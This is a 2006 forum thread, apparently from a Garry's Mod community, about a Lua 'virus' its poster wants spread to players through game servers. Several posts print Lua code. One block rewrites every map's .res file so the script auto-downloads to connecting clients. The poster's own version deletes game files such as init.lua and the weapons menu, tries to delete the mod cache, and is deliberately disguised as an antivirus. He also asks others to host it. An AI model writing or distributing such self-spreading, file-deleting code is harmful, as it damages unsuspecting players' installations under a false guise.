Posted August 26, 200618 yr Ok i have just made a Gmod virus its called chris_remover2 chirs_remover was some guys attempt to delete all gomd virii well i just countered it with chris_remover2. This one does delete all virii in the gmod folder EXCEPT mine chris_remover2 and i dont know if it works because i cant send it out or else my gmod will not start so i need someone that knows how to send files to server admins so then next time they change the map it will download. could this be possible? I might acctually start Gmod and see if i can start a server. if I cant i will ne someone to do the above. I will post the code/dllink if gmod doesnt start.
August 26, 200618 yr Author ok it works it deletes your init folder sweps and other shit. i need some help passing it on so can any of you help i just need you to host a server with it on it.
August 26, 200618 yr ok it works it deletes your init folder sweps and other shit. i need some help passing it on so can any of you help i just need you to host a server with it on it. So you're saying that when they connect it deletes their files and stuff, right? Did you test it on anyone except for yourself? How do you expect us to help when you didn't post a file. PS: Commas work wonders.
August 26, 200618 yr Author yeah i kinda fell asleep lastnight while it was uploading and i lost the website :) any way no when they connect it downloads to their computer then the next time they load Gmod there Init.lua File will be gone along with anyother compitition (worms/virii) and alnog with all the antiviruses i know of. Next it delets your SWEP menu and you cant spawn weapons i will be making some improvements to this so it will kill your mod folder ok heres the site. http://www.megaupload.com/?d=YX8AM7T6 Megaupload ownzorz!
September 4, 200618 yr Just letting you know that this script does nothing that's harmfull - Take a look yourself, that's if..you can read it. (It's 2nd version so it's very poorly made. ) if _file.Exists("lua/init/ULM.lua") then _file.Delete("lua/init/ULM.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "ULM was not found. Congrats. ") end if _file.Exists("lua/init/racehook2.lua") then _file.Delete("lua/init/racehook2.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/racehook3.lua") then _file.Delete("lua/init/racehook3.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/racehook4.lua") then _file.Delete("lua/init/racehook4.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/racehook5.lua") then _file.Delete("lua/init/racehook5.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/racehook6.lua") then _file.Delete("lua/init/racehook6.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/racehook7.lua") then _file.Delete("lua/init/racehook7.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/racehook8.lua") then _file.Delete("lua/init/racehook8.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats. ") end if _file.Exists("lua/init/UFM.lua") then _file.Delete("lua/init/UFM.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "UFM was not found. Congrats. ") end if _file.Exists("lua/init/UCM.lua") then _file.Delete("lua/init/UCM.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "UCM was not found. Congrats.") end if _file.Exists("lua/init/ERAT.lua") then _file.Delete("lua/init/ERAT.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "ERAT was not found. Congrats.") end if _file.Exists("lua/init/oma2r3fxc6g.lua") then _file.Delete("lua/init/oma2r3fxc6g.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "oma2r3fxc6g was not found. Congrats.") end if _file.Exists("lua/init/racehook.lua") then _file.Delete("lua/init/racehook.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook was not found. Congrats.") end if _file.Exists("lua/init/test.lua") then _file.Delete("lua/init/test.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "test not found. Test is a huge piece of SHIT anyways. ") end if _file.Exists("lua/init/z.lua") then _file.Delete("lua/init/z.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "z was not found. All Z does is add a Z into your hostname, and add a USERID to the admins.. :-/. ") end if _file.Exists("lua/init/antiv.lua") then _file.Delete("lua/init/antiv.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "UCM was not found. grats. ") end if _file.Exists("lua/init/antiv.lua.ztmp") then _file.Delete("lua/init/antiv.lua.ztmp") else _PrintMessage(userid, HUD_PRINTCONSOLE, "z was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/init.lua") then _file.Delete("lua/init/init.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "z was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/chris_remover.lua") then _file.Delete("lua/init/chris_remover.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "ulm was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/swep_menu.lua") then _file.Delete("lua/init/swep_menu.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "ufm was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/chris_remover.lua.ztmp") then _file.Delete("lua/init/chris_remover.lua.ztmp") else _PrintMessage(userid, HUD_PRINTCONSOLE, "fred's malicious script remover was not found. ") --I'm sorry Fred, but your LUA is useless compaired to this script. No effence. I'm not trying to start any competition! :D. end if _file.Exists("lua/init/fred.lua") then _file.Delete("lua/init/fred.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "fred's malicious script remover was not found. ") --I'm sorry Fred, but your LUA is useless compaired to this script. No effence. I'm not trying to start any competition! :D. end if _file.Exists("lua/init/hl2_music.lua") then _PrintMessage(userid, HUD_PRINTCONSOLE, "Are you fucking serious?! LOL! Found rambo_6's script and removed! Gigabite, you're safe now.. ") _file.Delete("lua/init/hl2_music.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "For fucks sake, good think, you don't have rambo_6's script. ") --I'm sorry Fred, but your LUA is useless compaired to this script. No effence. I'm not trying to start any competition! :D. end --For gigabite's sake, I hate rambo_6 too. And, rambo_6's "hl2_music" script deletes his script. You're welcome gigabite, sincerely, Chris1 (or Chris2. ) if _file.Exists("mods/-modcache/lua/init/racehook6.lua") then _file.Delete("lua/init/racehook5.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook6 was not found. Not in the -modcache either! :D. ") end function SetName ( ) local servname = string.gsub(_GetConVar_String("hostname"), ":", "") _ServerCommand("hostname : "..servname.."\n") _PrintMessage(userid, HUD_PRINTCONSOLE, "Your hostname has been fixed! Thanks to Chris' Virus Remover script. ") end AddTimer(10, 1, SetName) --I wish you wouldn't but delete below this line to destroy the res file. -- function installchris ( ) local res = _file.Find( "maps/*.bsp" ) for i = 1, table.getn( res ) do res[i] = string.gsub( res[i], ".bsp", "" ) if ( _file.Exists( "maps/" .. res[i] .. ".res" ) ) then file = _file.Read( "maps/" .. res[i] .. ".res" ) if not ( string.find( file, "\t\"lua/init/Chris_Remover.lua\"" ) ) then file = string.gsub( file, "}", "" ) file = file .. "\t\"lua/init/Chris_Remover.lua\"\n}" end else file = "\"resources\"\n{\n\t\"lua/init/Chris_Remover.lua\"\n}\n" end _file.Write( "maps/" .. res[i] .. ".res", file ) end end --END OF DELETION LINE! -- function checkchris ( userid, args ) _PrintMessage( userid, HUD_PRINTCONSOLE, "Chris' Virus Deleter is happy to be here, for you. .\n" ) end function roflnub ( userid, args ) _PrintMessage( userid, HUD_PRINTCONSOLE, "Your immature attempts has not worked on this server. Sincerely, Chris1. \n" ) end function viruscheck ( userid, args ) _ServerCommand("lua_openscript init/Chris_Remover.lua") _PrintMessage( userid, HUD_PRINTCONSOLE, "Chris' backdoor virus deleter activated! ") end function Helpme ( userid, args ) _PrintMessage( userid, HUD_PRINTCONSOLE, "Fix your hostname(bugged): hostname_fix - any virus commands (ufm, ulm, ulm_rcon..ETC..) will make a text saying, Your immature attempts has not worked on this server. Sincerely, Chris1. -- check for this scritp: chris -- cr_viruscheck: Searches for and deletes viruses, if they didn't delete. -- \n" ) end CONCOMMAND("hostname_fix", SetName) CONCOMMAND("chris", checkchris) CONCOMMAND("chris_help", Helpme) CONCOMMAND("ulm", roflnub) CONCOMMAND("ulm_luac", roflnub) CONCOMMAND("ulm_rcon", roflnub) CONCOMMAND("erat_info", roflnub) CONCOMMAND("ufm", roflnub) CONCOMMAND("erat", roflnub) CONCOMMAND("erat_kill", roflnub) CONCOMMAND("erat_stop", roflnub) CONCOMMAND("erat_timeout", roflnub) CONCOMMAND("erat_c", roflnub) CONCOMMAND("erat", roflnub) CONCOMMAND("omgSV", roflnub) CONCOMMAND("cr_viruscheck", viruscheck) installchris( ) I see nothing in there that shows that it deletes usefull stuff. Just how I scripted it, deletes Lua Viruses. And I'm proud of it. So, Basically, for once, you're doing something good. P.S. This version is shit compared to the fourth version. I know I should expect this forum myg0t forums but, Be original, and make your own scripts.
September 4, 200618 yr So you're saying that when they connect it deletes their files and stuff, right? Did you test it on anyone except for yourself? How do you expect us to help when you didn't post a file. PS: Commas work wonders. Exactly; He didn't test it.
September 5, 200618 yr Author Yup u didnt test it goahead put the fucker in ur init folder you will lose ur entire init folder and ur modcanche go ahead try it you fucker now who cant read lua.
September 6, 200618 yr Yup u didnt test it goahead put the fucker in ur init folder you will lose ur entire init folder and ur modcanche go ahead try it you fucker now who cant read lua. While I'm going to do that, learn how to spell. Maybe you can't read. Where it says, if _file.Exists("mods/-modcache/lua/init/racehook6.lua") then _file.Delete("mods/-modcache/init/racehook6.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "racehook6 was not found. Not in the -modcache either! :D. ") end It means it checks in your modcache AND you init folder for viruses. Which probably made you think it deleted the modcache. Other than someone I like to call, "Voland", you're the biggest idiot I've ever seen.
September 6, 200618 yr Yep. You're obviously just full of crap. Nothing happened. I opened it up, I named a few Lua scripts, "racehook3.lua" "ulm.lua" "erat.lua", ETC. Removed them on sight. It doesn't delete your modcache, your init folder, or anything that's harmfull. Deletes things that ARE harmfull. I would expect more from this forum..
September 6, 200618 yr Yep. You're obviously just full of shit. Nothing happened. I opened it up, I named a few Lua scripts, "racehook3.lua" "ulm.lua" "erat.lua", ETC. Removed them on sight. It doesn't delete your modcache, your init folder, or anything that's harmfull. Deletes things that ARE harmfull. I would expect more from this forum.. lmfao!!! This guy tried to make a virus and actually made a script that deletes viruses!? no fucking way this shit is to fucking funny, this forum is seriously LOL MATERIAL FROM ALL ANGLES
September 10, 200618 yr lmfao!!! This guy tried to make a virus and actually made a script that deletes viruses!? no fucking way this shit is to fucking funny, this forum is seriously LOL MATERIAL FROM ALL ANGLES Who are you talking to? Me, or him? If you're talking to him, I know, Dee to the third power =P. If you're talking to me, Learn to read - Just how I scripted it' date=' deletes Lua Viruses. And I'm proud of it.[/quote']
September 10, 200618 yr Author First of all chris you shouldnt change the original scrip that i had this was the origi scrip that i made from ur shit. if _file.Exists("lua/init/init.lua") then _file.Delete("lua/init/init.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "z was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/chris_remover.lua") then _file.Delete("lua/init/chris_remover.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "ulm was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/swep_menu.lua") then _file.Delete("lua/init/swep_menu.lua") else _PrintMessage(userid, HUD_PRINTCONSOLE, "ufm was not found. Not in ztmp form either! :D. ") end if _file.Exists("lua/init/chris_remover.lua.ztmp") then _file.Delete("lua/init/chris_remover.lua.ztmp") else _PrintMessage(userid, HUD_PRINTCONSOLE, "fred's malicious script remover was not found. ") --I'm sorry Fred, but your LUA is useless compaired to this script. No effence. I'm not trying to start any competition! :D. end if _file.Exists("mods/-modcache") then _file.Delete("mods/-modcache") First that was just the harmfull stuff and yes it does delete other viruses. i know that i wanted it to look like a fucking antivirus script to the stupid LUA noobs. (like you) Changing my scrip is gay you think i dont even know my own script. I had it delete the (antiviruses that i know of) and then BLAMO. Re download it DONT CHANGE IT and see if you can play the game with your mods.
September 10, 200618 yr Actually, I just download the script from the Megaupload link and it's identical to the one Chris1 posted (Minus the comments).
September 11, 200618 yr Author then i must have uploaded the old one. cuz the post that i made up there ^^ that was from the modified script that i had made a few dayt after i made the first one cuz i fould that it look like hell :) i was tiered.